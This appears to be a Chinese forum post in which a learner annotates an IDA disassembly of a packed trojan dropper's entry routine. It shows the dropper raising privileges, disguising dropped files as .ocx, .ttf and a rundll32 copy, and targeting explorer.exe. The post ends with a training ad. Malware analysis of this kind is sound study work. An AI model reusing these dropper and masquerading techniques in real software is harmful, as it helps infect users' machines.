由于是第一次在论坛发贴,只是练练逆向的水平,..第一次分析这类病毒,不好的地方不要喷谢谢...
ida 分析如下:
UPX0:00401DA4 start proc near ; CODE XREF: UPX1:004136D8j
UPX0:00401DA4
UPX0:00401DA4 CommandLine= byte ptr -0B5Ch
UPX0:00401DA4 var_B5B= byte ptr -0B5Bh
UPX0:00401DA4 szCurrentModuleFileName= byte ptr -954h
UPX0:00401DA4 hFile= byte ptr -850h
UPX0:00401DA4 szGbvgbv07= byte ptr -74Ch
UPX0:00401DA4 NewFileName= byte ptr -648h
UPX0:00401DA4 FileName= byte ptr -544h
UPX0:00401DA4 Dest = byte ptr -440h
UPX0:00401DA4 szIme_Temp= byte ptr -33Ch
UPX0:00401DA4 hObject= byte ptr -238h
UPX0:00401DA4 Array_22E= byte ptr -22Eh
UPX0:00401DA4 szWindowsDirectory1= byte ptr -134h
UPX0:00401DA4 Array_127= byte ptr -127h
UPX0:00401DA4 szFileName= byte ptr -30h
UPX0:00401DA4 Exlorer.exe= byte ptr -1Ch
UPX0:00401DA4 var_1B= byte ptr -1Bh
UPX0:00401DA4 var_1A= byte ptr -1Ah
UPX0:00401DA4 var_19= byte ptr -19h
UPX0:00401DA4 var_18= byte ptr -18h
UPX0:00401DA4 var_17= byte ptr -17h
UPX0:00401DA4 var_16= byte ptr -16h
UPX0:00401DA4 var_15= byte ptr -15h
UPX0:00401DA4 var_14= byte ptr -14h
UPX0:00401DA4 var_13= byte ptr -13h
UPX0:00401DA4 var_12= byte ptr -12h
UPX0:00401DA4 var_11= byte ptr -11h
UPX0:00401DA4 var_10= byte ptr -10h
UPX0:00401DA4 SzFontsDir= byte ptr -0Ch
UPX0:00401DA4 nNumberOfBytesToWrite= byte ptr -4
UPX0:00401DA4
UPX0:00401DA4 push ebp
UPX0:00401DA5 mov ebp, esp
UPX0:00401DA7 sub esp, 2908
UPX0:00401DAD push ebx
UPX0:00401DAE push esi
UPX0:00401DAF push edi
UPX0:00401DB0 push 62
UPX0:00401DB2 xor ebx, ebx
UPX0:00401DB4 pop ecx
UPX0:00401DB5 xor eax, eax
UPX0:00401DB7 lea edi, [ebp+Array_22E]
UPX0:00401DBD mov [ebp+hObject], 'w'
UPX0:00401DC4 mov [ebp+hObject+1], 'i'
UPX0:00401DCB mov [ebp+hObject+2], 'n'
UPX0:00401DD2 mov [ebp+hObject+3], 'n'
UPX0:00401DD9 mov [ebp+hObject+4], 't'
UPX0:00401DE0 mov [ebp+hObject+5], '.'
UPX0:00401DE7 mov [ebp+hObject+6], 'c'
UPX0:00401DEE mov [ebp+hObject+7], 'o'
UPX0:00401DF5 mov [ebp+hObject+8], 'm'
UPX0:00401DFC mov [ebp+hObject+9], bl
UPX0:00401E02 rep stosd
UPX0:00401E04 stosw
UPX0:00401E06 push 64
UPX0:00401E08 xor eax, eax
UPX0:00401E0A pop ecx
UPX0:00401E0B lea edi, [ebp+Dest+1]
UPX0:00401E11 mov [ebp+Dest], bl
UPX0:00401E17 mov esi, sprintf
UPX0:00401E1D rep stosd
UPX0:00401E1F stosw
UPX0:00401E21 stosb
UPX0:00401E22 push offset a005 ; "005"
UPX0:00401E27 lea eax, [ebp+Dest]
UPX0:00401E2D push offset Format ; "dbr99%s.ocx"
UPX0:00401E32 push eax ; Dest
UPX0:00401E33 mov [ebp+nNumberOfBytesToWrite], 'T'
UPX0:00401E37 mov [ebp+nNumberOfBytesToWrite+1], 'L'
UPX0:00401E3B mov [ebp+nNumberOfBytesToWrite+2], 'S'
UPX0:00401E3F mov [ebp+nNumberOfBytesToWrite+3], bl
UPX0:00401E42 call esi ; sprintf ;
UPX0:00401E42 ; sprintf(&dest, "dbr99%s.ocx", "005"); 不知道为什么这样写.
UPX0:00401E42 ;
UPX0:00401E44 add esp, 0Ch
UPX0:00401E47 xor eax, eax
UPX0:00401E49 lea edi, [ebp+FileName+1]
UPX0:00401E4F mov [ebp+FileName], bl
UPX0:00401E55 push 64
UPX0:00401E57 mov [ebp+szIme_Temp], bl
UPX0:00401E5D pop ecx
UPX0:00401E5E mov [ebp+szWindowsDirectory1], 'r'
UPX0:00401E65 rep stosd
UPX0:00401E67 stosw
UPX0:00401E69 stosb
UPX0:00401E6A push 64
UPX0:00401E6C xor eax, eax
UPX0:00401E6E pop ecx
UPX0:00401E6F lea edi, [ebp+szIme_Temp+1]
UPX0:00401E75 rep stosd
UPX0:00401E77 stosw
UPX0:00401E79 stosb ;
UPX0:00401E79 ; 以上代码是两个memset 260个元素的数组清0,加入了流水线乱序,看着比较郁闷
UPX0:00401E7A push 61
UPX0:00401E7C xor eax, eax
UPX0:00401E7E pop ecx
UPX0:00401E7F lea edi, [ebp+Array_127]
UPX0:00401E85 mov [ebp+szWindowsDirectory1+1], 'u'
UPX0:00401E8C mov [ebp+szWindowsDirectory1+2], 'n'
UPX0:00401E93 mov [ebp+szWindowsDirectory1+3], 'd'
UPX0:00401E9A mov [ebp+szWindowsDirectory1+4], 'l'
UPX0:00401EA1 mov [ebp+szWindowsDirectory1+5], 'l'
UPX0:00401EA8 mov [ebp+szWindowsDirectory1+6], '3'
UPX0:00401EAF mov [ebp+szWindowsDirectory1+7], '2'
UPX0:00401EB6 mov [ebp+szWindowsDirectory1+8], '.'
UPX0:00401EBD mov [ebp+szWindowsDirectory1+9], 'e'
UPX0:00401EC4 mov [ebp+szWindowsDirectory1+0Ah], 'x'
UPX0:00401ECB mov [ebp+szWindowsDirectory1+0Bh], 'e'
UPX0:00401ED2 mov [ebp+szWindowsDirectory1+0Ch], bl
UPX0:00401ED8 rep stosd
UPX0:00401EDA stosw
UPX0:00401EDC stosb
UPX0:00401EDD push 64
UPX0:00401EDF xor eax, eax
UPX0:00401EE1 pop ecx
UPX0:00401EE2 lea edi, [ebp+szGbvgbv07+1]
UPX0:00401EE8 mov [ebp+szGbvgbv07], bl
UPX0:00401EEE rep stosd
UPX0:00401EF0 stosw
UPX0:00401EF2 stosb
UPX0:00401EF3 call ChangeProcessToken ; 修改进程令牌权限
UPX0:00401EF8 mov edi, 260
UPX0:00401EFD lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F03 push edi ; nSize
UPX0:00401F04 push eax ; lpFilename
UPX0:00401F05 push ebx ; hModule
UPX0:00401F06 call GetModuleFileNameA ;
UPX0:00401F06 ; 获取一个已装载模板的完整路径名称,hModule 为空则获取当前模块.
UPX0:00401F0C lea eax, [ebp+szFileName]
UPX0:00401F0F push offset aDbr07028 ; "dbr07028"
UPX0:00401F14 push eax ; Dest
UPX0:00401F15 call esi ; sprintf ;
UPX0:00401F15 ; sprintf(&szFileName, "dbr07028");
UPX0:00401F17 lea eax, [ebp+szFileName]
UPX0:00401F1A push eax
UPX0:00401F1B lea eax, [ebp+NewFileName]
UPX0:00401F21 push eax
UPX0:00401F22 call _mbscpy ;
UPX0:00401F22 ; _mbscpy(&NewFileName, &szFileName);
UPX0:00401F27 lea eax, [ebp+NewFileName]
UPX0:00401F2D push offset a_ocx ; ".ocx"
UPX0:00401F32 push eax
UPX0:00401F33 call _mbscat ;
UPX0:00401F33 ; _mbscat(&NewFileName, ".ocx"); 字符串连接
UPX0:00401F38 lea eax, [ebp+NewFileName]
UPX0:00401F3E push eax
UPX0:00401F3F lea eax, [ebp+NewFileName]
UPX0:00401F45 push eax
UPX0:00401F46 call MyGetWindowsDirectory ;
UPX0:00401F46 ; 病毒作者, 这里不知道为什么传2个Newfilename的地址进去,都是传进传出值.
UPX0:00401F46 ; 得到 要生成木马的全部路径
UPX0:00401F4B lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F51 push eax ; NumberOfBytesRead
UPX0:00401F52 call Decrypt_PostAddress ;
UPX0:00401F52 ; 对一些加密的数据进行的解密操作,并且检查是否程序被脱壳.
UPX0:00401F57 add esp, 24h
UPX0:00401F5A lea eax, [ebp+hFile]
UPX0:00401F60 mov [ebp+SzFontsDir], '\'
UPX0:00401F64 mov [ebp+SzFontsDir+1], 'f'
UPX0:00401F68 push edi ; uSize
UPX0:00401F69 push eax ; lpBuffer
UPX0:00401F6A mov [ebp+SzFontsDir+2], 'o'
UPX0:00401F6E mov [ebp+SzFontsDir+3], 'n'
UPX0:00401F72 mov [ebp+SzFontsDir+4], 't'
UPX0:00401F76 mov [ebp+SzFontsDir+5], 's'
UPX0:00401F7A mov [ebp+SzFontsDir+6], '\'
UPX0:00401F7E mov [ebp+SzFontsDir+7], bl
UPX0:00401F81 call GetWindowsDirectoryA
UPX0:00401F87 lea eax, [ebp+SzFontsDir]
UPX0:00401F8A push eax
UPX0:00401F8B lea eax, [ebp+hFile]
UPX0:00401F91 push eax
UPX0:00401F92 call _mbscat ;
UPX0:00401F92 ; 合并目录,估计要在windows目录下创建这个目录.
UPX0:00401F97 lea eax, [ebp+szFileName]
UPX0:00401F9A push eax
UPX0:00401F9B lea eax, [ebp+hFile]
UPX0:00401FA1 push eax
UPX0:00401FA2 call _mbscat ;
UPX0:00401FA2 ; + "dbr07028"
UPX0:00401FA7 lea eax, [ebp+hFile]
UPX0:00401FAD push offset a_ttf ; ".ttf"
UPX0:00401FB2 push eax
UPX0:00401FB3 call _mbscat ;
UPX0:00401FB3 ; +",ttf"
UPX0:00401FB8 lea eax, [ebp+hFile]
UPX0:00401FBE push eax ; hFile
UPX0:00401FBF call _CreateFile_Encryption
UPX0:00401FC4 mov edi, GetTickCount
UPX0:00401FCA add esp, 1Ch
UPX0:00401FCD call edi ; GetTickCount ; 取系统开机到目前的运行时间.貌似求随机数.
UPX0:00401FCF push eax
UPX0:00401FD0 lea eax, [ebp+FileName]
UPX0:00401FD6 push offset a08xmdd_temp ; "%08Xmdd.temp"
UPX0:00401FDB push eax ; Dest
UPX0:00401FDC call esi ; sprintf ;
UPX0:00401FDC ; sprintf(&eax, "%08xmdd.temp", eax);
UPX0:00401FDE lea eax, [ebp+FileName]
UPX0:00401FE4 push eax
UPX0:00401FE5 lea eax, [ebp+FileName]
UPX0:00401FEB push eax
UPX0:00401FEC call GetTempPath_Set
UPX0:00401FF1 lea eax, [ebp+FileName]
UPX0:00401FF7 push eax ; lpFileName
UPX0:00401FF8 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:00401FFB push 66h ; NumberOfBytesWritten
UPX0:00401FFD push eax ; nNumberOfBytesToWrite
UPX0:00401FFE push ebx ; hModule
UPX0:00401FFF call CreateTempFile ;
UPX0:00401FFF ; 传得是 CreateFile的参数..
UPX0:00402004 add esp, 24h
UPX0:00402007 lea eax, [ebp+NewFileName]
UPX0:0040200D push 3 ; dwFlags
UPX0:0040200F push eax ; lpNewFileName
UPX0:00402010 lea eax, [ebp+FileName]
UPX0:00402016 push eax ; lpExistingFileName
UPX0:00402017 call MoveFileExA ; 移动文件,替换原来的,目标存在覆盖.
UPX0:0040201D call edi ; GetTickCount
UPX0:0040201F push eax
UPX0:00402020 lea eax, [ebp+szIme_Temp]
UPX0:00402026 push offset a08xime_temp ; "%08Xime.temp"
UPX0:0040202B push eax ; Dest
UPX0:0040202C call esi ; sprintf ; 重复上面的创建临时文件的行为.
UPX0:0040202E lea eax, [ebp+szIme_Temp]
UPX0:00402034 push eax
UPX0:00402035 lea eax, [ebp+szIme_Temp]
UPX0:0040203B push eax
UPX0:0040203C call GetTempPath_Set
UPX0:00402041 lea eax, [ebp+szIme_Temp]
UPX0:00402047 push eax ; lpFileName
UPX0:00402048 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:0040204B push 65h ; NumberOfBytesWritten
UPX0:0040204D push eax ; nNumberOfBytesToWrite
UPX0:0040204E push ebx ; hModule
UPX0:0040204F call CreateTempFile
UPX0:00402054 lea eax, [ebp+hObject]
UPX0:0040205A push eax
UPX0:0040205B lea eax, [ebp+hObject]
UPX0:00402061 push eax
UPX0:00402062 call MyGetWindowsDirectory
UPX0:00402067 add esp, 2Ch
UPX0:0040206A lea eax, [ebp+hObject]
UPX0:00402070 push 3 ; dwFlags
UPX0:00402072 push eax ; lpNewFileName
UPX0:00402073 lea eax, [ebp+szIme_Temp]
UPX0:00402079 push eax ; lpExistingFileName
UPX0:0040207A call MoveFileExA
UPX0:00402080 call edi ; GetTickCount
UPX0:00402082 push eax
UPX0:00402083 lea eax, [ebp+szIme_Temp]
UPX0:00402089 push offset a08xeime_temp ; "%08Xeime.temp"
UPX0:0040208E push eax ; Dest
UPX0:0040208F call esi ; sprintf
UPX0:00402091 lea eax, [ebp+szIme_Temp]
UPX0:00402097 push eax
UPX0:00402098 lea eax, [ebp+szIme_Temp]
UPX0:0040209E push eax
UPX0:0040209F call GetTempPath_Set
UPX0:004020A4 lea eax, [ebp+szIme_Temp]
UPX0:004020AA push eax ; lpFileName
UPX0:004020AB lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:004020AE push 67h ; NumberOfBytesWritten
UPX0:004020B0 push eax ; nNumberOfBytesToWrite
UPX0:004020B1 push ebx ; hModule
UPX0:004020B2 call CreateTempFile
UPX0:004020B7 lea eax, [ebp+Dest]
UPX0:004020BD push eax
UPX0:004020BE lea eax, [ebp+Dest]
UPX0:004020C4 push eax
UPX0:004020C5 call MyGetWindowsDirectory ; 得到系统目录.
UPX0:004020CA add esp, 2Ch
UPX0:004020CD lea eax, [ebp+Dest]
UPX0:004020D3 push 3 ; dwFlags
UPX0:004020D5 push eax ; lpNewFileName
UPX0:004020D6 lea eax, [ebp+szIme_Temp]
UPX0:004020DC push eax ; lpExistingFileName
UPX0:004020DD call MoveFileExA ; 把刚刚创建的szime的文件,复制到创建的文件夹下
UPX0:004020E3 lea eax, [ebp+szWindowsDirectory1]
UPX0:004020E9 push eax
UPX0:004020EA lea eax, [ebp+szWindowsDirectory1]
UPX0:004020F0 push eax
UPX0:004020F1 call MyGetWindowsDirectory
UPX0:004020F6 lea eax, [ebp+szGbvgbv07]
UPX0:004020FC push eax
UPX0:004020FD push offset aGbvgbv07_exe ; "gbvgbv07.exe"
UPX0:00402102 call MyGetWindowsDirectory ; 此函数多次调用,每次调用都是对系统里创建了东西,具体可根据od载入分析.
UPX0:00402107 add esp, 10h
UPX0:0040210A lea eax, [ebp+szGbvgbv07]
UPX0:00402110 push ebx ; bFailIfExists
UPX0:00402111 push eax ; lpNewFileName
UPX0:00402112 lea eax, [ebp+szWindowsDirectory1]
UPX0:00402118 push eax ; lpExistingFileName
UPX0:00402119 call CopyFileA
UPX0:0040211F lea eax, [ebp+hObject]
UPX0:00402125 mov [ebp+Exlorer.exe], 'e'
UPX0:00402129 push eax ; hObject
UPX0:0040212A lea eax, [ebp+Exlorer.exe]
UPX0:0040212D push eax ; Exlorer.exe
UPX0:0040212E mov [ebp+var_1B], 'x'
UPX0:00402132 mov [ebp+var_1A], 'p'
UPX0:00402136 mov [ebp+var_19], 'l'
UPX0:0040213A mov [ebp+var_18], 'o'
UPX0:0040213E mov [ebp+var_17], 'r'
UPX0:00402142 mov [ebp+var_16], 'e'
UPX0:00402146 mov [ebp+var_15], 'r'
UPX0:0040214A mov [ebp+var_14], '.'
UPX0:0040214E mov [ebp+var_13], 'e'
UPX0:00402152 mov [ebp+var_12], 'x'
UPX0:00402156 mov [ebp+var_11], 'e'
UPX0:0040215A mov [ebp+var_10], bl
UPX0:0040215D call FindExplorer ; explorer.exe 貌似想注入.
UPX0:00402162 mov ecx, 81h
UPX0:00402167 xor eax, eax
UPX0:00402169 lea edi, [ebp+var_B5B]
UPX0:0040216F mov [ebp+CommandLine], bl
UPX0:00402175 rep stosd
UPX0:00402177 stosw
UPX0:00402179 stosb
UPX0:0040217A lea eax, [ebp+NewFileName]
UPX0:00402180 push eax ; lpFileName
UPX0:00402181 call sub_401894
UPX0:00402186 mov esi, WsPrintf
UPX0:0040218C add esp, 0Ch
UPX0:0040218F test eax, eax
UPX0:00402191 jz short loc_4021C5
UPX0:00402193 lea eax, [ebp+szCurrentModuleFileName]
UPX0:00402199 push eax ; _DWORD
UPX0:0040219A lea eax, [ebp+NewFileName]
UPX0:004021A0 push eax ; _DWORD
UPX0:004021A1 lea eax, [ebp+szGbvgbv07]
UPX0:004021A7 push eax ; _DWORD
UPX0:004021A8 lea eax, [ebp+CommandLine]
UPX0:004021AE push offset aSSPfjaoidjglka ; "%s %s pfjaoidjglkajd %s"
UPX0:004021B3 push eax ; _DWORD
UPX0:004021B4 call esi ; WsPrintf
UPX0:004021B6 lea eax, [ebp+CommandLine]
UPX0:004021BC push eax ; lpCommandLine
UPX0:004021BD call sub_401CAC
UPX0:004021C2 add esp, 18h
UPX0:004021C5
UPX0:004021C5 loc_4021C5: ; CODE XREF: start+3EDj
UPX0:004021C5 lea eax, [ebp+Dest]
UPX0:004021CB push eax ; lpFileName
UPX0:004021CC call sub_401894
UPX0:004021D1 test eax, eax
UPX0:004021D3 pop ecx
UPX0:004021D4 jz short loc_402201
UPX0:004021D6 lea eax, [ebp+Dest]
UPX0:004021DC push eax ; _DWORD
UPX0:004021DD lea eax, [ebp+szGbvgbv07]
UPX0:004021E3 push eax ; _DWORD
UPX0:004021E4 lea eax, [ebp+CommandLine]
UPX0:004021EA push offset aSSPfjieaoidjgl ; "%s %s pfjieaoidjglkajd"
UPX0:004021EF push eax ; _DWORD
UPX0:004021F0 call esi ; WsPrintf
UPX0:004021F2 lea eax, [ebp+CommandLine]
UPX0:004021F8 push eax ; lpCommandLine
UPX0:004021F9 call sub_401CAC
UPX0:004021FE add esp, 14h
UPX0:00402201
UPX0:00402201 loc_402201: ; CODE XREF: start+430j
UPX0:00402201 push ebx ; uExitCode
UPX0:00402202 call ExitProcess
UPX0:00402208 ; ---------------------------------------------------------------------------
UPX0:00402208 push 1
UPX0:0040220A pop eax
UPX0:0040220B pop edi
UPX0:0040220C pop esi
UPX0:0040220D pop ebx
UPX0:0040220E leave
UPX0:0040220E start endp ; sp-analysis failed
UPX0:0040220E
UPX0:0040220F retn 10h
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
